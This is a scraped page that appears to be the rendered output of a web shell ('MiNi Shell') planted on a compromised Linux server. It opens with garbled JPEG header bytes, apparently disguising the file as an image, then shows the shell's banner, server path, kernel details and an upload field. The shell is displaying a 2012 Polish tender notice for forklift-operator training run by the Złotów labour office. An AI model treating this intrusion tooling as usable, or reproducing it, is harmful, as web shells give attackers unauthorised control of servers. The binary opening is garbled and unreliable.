JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120510/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120510/148844-N-2012.html

<p class="kh_header"><b>Złotów: Kierowca operator wózków jezdniowych</b><br>
<b>Numer ogłoszenia: 148844 - 2012; data zamieszczenia: 10.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Kolejowa 11, 77-400 Złotów, woj. wielkopolskie, tel. 067 2635434, faks 067 2635434.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> pup.zlotow.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kierowca operator wózków jezdniowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia: Kierowca operator wózków jezdniowych dla 10 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Złotowie. 
Program szkolenia zajęć teoretycznych i praktycznych musi być zgodny z wytycznymi Urzędu Dozoru Technicznego.
Wykonawca zobowiązany jest każdego z uczestników na zajęciach praktycznych wyposażyć odrębnie w równej ilości w odpowiedni sprzęt, materiały i produkty, a jeżeli to konieczne w ilości większej, oraz inne niezbędne do prawidłowego przebiegu nauki szkolenia i zdobycia wymaganych umiejętności w zawodzie kierowca operator wózków jezdniowych.
Termin wykonania zamówienia: maj - czerwiec 2012r.	
Wymagania dotyczące sposobu realizacji zamówienia:
1) miejsce realizacji szkolenia: miasto Złotów
2) czas trwania szkolenia : 67 godzin zegarowych,  tj. 11 dni roboczych, w tym:
a) w pierwszym dniu szkolenia wyłącznie 3 godziny zajęć integracyjnych,
b) 49 godzin zajęć teoretycznych zgodnie z przepisami Urzędu Dozoru Technicznego,
c) 15 godzin zajęć praktycznych zgodnie z przepisami Urzędu Dozoru Technicznego,
3) zajęcia szkoleniowe muszą odbywać się zgodnie z przyjętym harmonogramem, nie krócej niż 6 godzin dziennie i nie dłużej niż 8 godzin dziennie według planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu i kończyć się do godziny 16.00,
4) realizacja szkolenia musi odbywać się w oparciu o nowoczesne metody i techniki dydaktyczno-pedagogiczne , zgodnie z obowiązującym prawem, zasadami bhp i p. poż.
5) każdy uczestnik szkolenia musi być wyposażony w środki ochrony indywidualnej oraz  identyfikator z imieniem i nazwiskiem uczestnika szkolenia,
6) każdy uczestnik szkolenia musi być wyposażony w materiały szkoleniowe w tym zeszyt formatu A5 nie mniejszy niż 32 kartkowy, długopis, skrypty tematyczne zgodne z zakresem szkolenia i inne przekazane uczestnikom szkolenia za potwierdzeniem odbioru, z wyszczególnieniem przekazanych materiałów szkoleniowych na własność,
Wszelkie dokumenty dotyczące realizacji szkolenia muszą zawierać informację o współfinansowaniu  szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu  Społecznego, logotyp Programu Operacyjnego Kapitał Ludzki oraz logotyp Unii Europejskiej wraz z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego zgodnie z wytycznymi dotyczącymi oznaczenia projektów w ramach Programu Operacyjnego Kapitał Ludzki, (informacje: www.efs.gov.pl)
7) w przypadku podziału uczestników na grupy, każda grupa musi mieć zapewniony nadzór wykładowcy / instruktora,
8) uczestnicy szkolenia muszą być ubezpieczeni od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem oraz w drodze do miejsca szkolenia i z powrotem,
9) podczas realizacji szkolenia musi być prowadzona dokumentacja szkolenia tj.:
a) dziennik zajęć edukacyjnych zawierający tematy i wymiar godzin edukacyjnych 
  oraz listę obecności zawierającą:  imię, nazwisko i podpis uczestnika szkolenia,
b) protokół i karty ocen z okresowych sprawdzianów efektów kształcenia oraz 
    egzaminu końcowego,
c) rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających 
    ukończenie szkolenia i uzyskanie kwalifikacji, zawierający: numer, imię 
    i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca   numer dokumentu stwierdzającego tożsamość oraz nazwę szkolenia i datę wydania  zaświadczenia,
10) szkolenie musi zakończyć się egzaminem ze zdobytej wiedzy teoretycznej i praktycznej oraz wydaniem uprawnionym uczestnikom szkolenia zaświadczeń lub innego dokumentu o nabytych kwalifikacjach potwierdzającego ukończenie przedmiotowego szkolenia i uzyskanie kwalifikacji zawierającego dane uczestnika szkolenia oraz dokumentów potwierdzających uzyskanie stosownych uprawnień określonych odrębnymi przepisami.
11) egzamin musi się odbyć przed komisją Urzędu Dozoru Technicznego,
12) zaświadczenia o ukończeniu szkolenia wydawane uczestnikom szkolenia muszą być zgodne  z  § 75.3. Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. Nr 177, poz. 1193 ze zm.)
13) zakończenie szkolenia musi być poprzedzone przeprowadzeniem wśród uczestników szkolenia anonimowej ankiety oceny szkolenia,
14) do przeprowadzonych anonimowych ankiet oceny szkolenia musi być sporządzony końcowy raport z realizacji szkolenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 11.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wpis do Rejestru Instytucji Szkoleniowych  prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na  siedzibę instytucji szkoleniowej zgodnie z Rozporządzeniem Ministra  Gospodarki i Pracy z dnia 27 października 2004 r. w sprawie rejestru instytucji  szkoleniowych (Dz. U. Nr 236, poz. 2365 ze zm.) aktualne na rok, w którym Wykonawca ubiega się o zamówienie.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana przez Zamawiającego na podstawie żądanych w dziale VI SIWZ oświadczeń i dokumentów, wg. formuły spełnia  nie spełnia. Nie spełnienie choćby jednego warunku, skutkować będzie wykluczeniem Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi udokumentować, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy w tym okresie przeprowadził co najmniej 2 szkolenia grupowe ( dla grup co najmniej 10 osobowych ) o tematyce Kierowca operator wózka jezdniowego z załączeniem dokumentów potwierdzających, że szkolenia zostały zorganizowane należycie.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana przez Zamawiającego na podstawie żądanych w dziale VI SIWZ oświadczeń i dokumentów, wg. formuły spełnia  nie spełnia. Nie spełnienie choćby jednego warunku, skutkować będzie wykluczeniem Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje lub będzie dysponował:
1) salą szkoleniową z możliwością skorzystania z pomieszczeń sanitarnych i socjalnych o powierzchni minimum 25 m 2, spełniającą wymagania ergonomiczne i bhp, w której odbywać się będzie szkolenie w zakresie zajęć teoretycznych, wyposażoną w odpowiednią ilość miejsc i stolików, dla każdego uczestnika odrębne miejsce tj. 10 stanowisk szkoleniowych oraz wyposażoną w  środki dydaktyczne w tym co najmniej: tablice, projektor multimedialny, ekran, 

Pomieszczenia, w których odbywać się będzie szkolenie muszą być oznaczone poprzez wywieszenie plakatu, tablicy informacyjnej, naklejki lub innego rodzaju materiału zawierającego dwa podstawowe logotypy: Logo Programu Operacyjnego Kapitał Ludzki i flagę Unii Europejskiej z dwoma podpisami oraz informację o realizowaniu szkolenia współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego zgodnie z wytycznymi dotyczącymi oznaczenia projektów w ramach Programu Operacyjnego Kapitał Ludzki, (informacje: www.efs.gov.pl),

2)  odpowiednim  miejscem do realizacji części praktycznej, odpowiednio oznaczonym i oznakowanym pomieszczeniem z możliwością skorzystania z pomieszczeń sanitarnych i socjalnych, wyposażonym w odpowiedni i sprawny sprzęt, narzędzia w ilości niezbędnej do realizacji części praktycznej, tak aby każdy z uczestników szkolenia mógł odbyć część praktyczną szkolenia i nabyć umiejętności w zawodzie kierowca operator wózków jezdniowych.
3) w okresie realizacji zajęć praktycznych szkolenia Wykonawca musi  posiadać do dyspozycji uczestników szkolenia co najmniej cztery wózki jezdniowe sprawne     technicznie.

Używane materiały, sprzęt, urządzenia itp. wykorzystywane przy realizacji szkolenia muszą być zgodne z normami polskimi, posiadać stosowne atesty, aprobaty techniczne, certyfikaty i dopuszczenia oraz być zgodne z zaleceniami inspektorów nadzoru.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana przez Zamawiającego na podstawie żądanych w dziale VI SIWZ oświadczeń i dokumentów, wg. formuły spełnia  nie spełnia. Nie spełnienie choćby jednego warunku, skutkować będzie wykluczeniem Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje lub będzie dysponował:
1)  do realizacji zajęć teoretycznych:
- minimum jednym wykładowcą z wykształceniem wyższym magisterskim w zakresie psychologii lub pedagogiki,
- minimum jednym wykładowcą z wykształceniem wyższym technicznym,
- minimum jednym wykładowcą z uprawnieniami do prowadzenia szkolenia w zakresie bezpieczeństwa i higieny pracy,
2) do realizacji zajęć praktycznych:
- do realizacji zajęć praktycznych minimum jednym wykładowcą z wykształceniem minimum średnim technicznym i uprawnieniami do obsługi wózków jezdniowych z minimum dwuletnim doświadczeniem zawodowym w obsłudze wózków jezdniowych,
3) w przypadku zdarzeń losowych wykładowcami na zastępstwo osób  wykazanych w     ofercie do realizacji zajęć teoretycznych i zajęć praktycznych. Wykładowcy wskazani na zastępstwo muszą posiadać kwalifikacje  i  doświadczenie przynajmniej równe określonym w pkt 1) i 2),

Kadra dydaktyczna musi posiadać minimum dwuletni staż zawodowy w zakresie prowadzonych zajęć szkoleniowych.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana przez Zamawiającego na podstawie żądanych w dziale VI SIWZ oświadczeń i dokumentów, wg. formuły spełnia  nie spełnia. Nie spełnienie choćby jednego warunku, skutkować będzie wykluczeniem Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że jest objęty ubezpieczeniem odpowiedzialności cywilnej w zakresie prowadzonej  działalności gospodarczej związanej z przedmiotem zamówienia.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana przez Zamawiającego na podstawie żądanych w dziale VI SIWZ oświadczeń i dokumentów, wg. formuły spełnia  nie spełnia. Nie spełnienie choćby jednego warunku, skutkować będzie wykluczeniem Wykonawcy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty Wykonawca musi dołączyć:
1) Formularz ofertowy  stanowiący załącznik Nr 1 do SIWZ,
2) program szkolenia na podstawie załącznika Nr 6 do SIWZ,
3) zaparafowany wzór umowy stanowiący załącznik Nr 8 do SIWZ,
4) oświadczenie o zapewnieniu ochrony danych osobowych osób uczestniczących 
w  szkoleniu zgodnie z ustawą z dnia 29 sierpnia 1997 r. o ochronie danych osobowych ( tekst jednolity  Dz. U. z  2002 r. Nr 101, poz. 926 z późn. zm.) stanowiące załącznik Nr 2 do SIWZ,
5) zobowiązanie do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników szkolenia, którym nie przysługuje stypendium oraz, którym przysługuje stypendium, o którym mowa w art. 41 ust. 3 b ustawy z dnia 20 kwietnia 2004r. o promocji zatrudnienia i instytucjach rynku pracy (tj.  Dz. U z 2008r. Nr 69, poz. 415 z późn. zm.) stanowiące załącznik Nr 9 do SIWZ,
6) w przypadku posiadania - certyfikat jakości usług w dziedzinie kształcenia/szkolenia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - posiadanie certyfikatu jakości usług w dziedzinie kształcenia - 30</li>
<li>3 - liczba zorganizowanych i przeprowadzonych z należytą starannością szkoleń o tematyce Kierowca operator wózków jezdniowych w ciągu ostatnich .... - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust.1 ustawy Prawo zamówień publicznych na uzasadniony wniosek Zamawiającego, przewiduje się możliwość dokonania zmian w umowie dotyczącej zmniejszenia liczby uczestników szkolenia w przypadku wystąpienia okoliczności niezależnych i niezawinionych przez Zamawiającego, których nie można było przewidzieć w chwili zawarcia umowy, a powodujących, że wykonanie zamówienia nie jest możliwe w liczbie określonej przez Wykonawcę. 
Zmiany postanowień zawartej umowy mogą być także dokonywane w zakresie aktualizacji danych Wykonawcy poprzez zmianę w szczególności nazwy przedsiębiorstwa, zmianę adresu siedziby, zmianę formy prawnej Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> pup.zlotow.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Złotowie
ul. Kolejowa 11
77-400 Złotów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.05.2012 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Złotowie, ul. Kolejowa 11, 77-400 Złotów w     sekretariacie - I piętro, w godzinach urzędowania tj. od poniedziałku do piątku
w godz. 7.30-15.30, lub za pośrednictwem poczty.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany  ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Aktywność drogą do zatrudnienia czyli od A do Z  Priorytet VI Rynek pracy otwarty dla wszystkich,Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com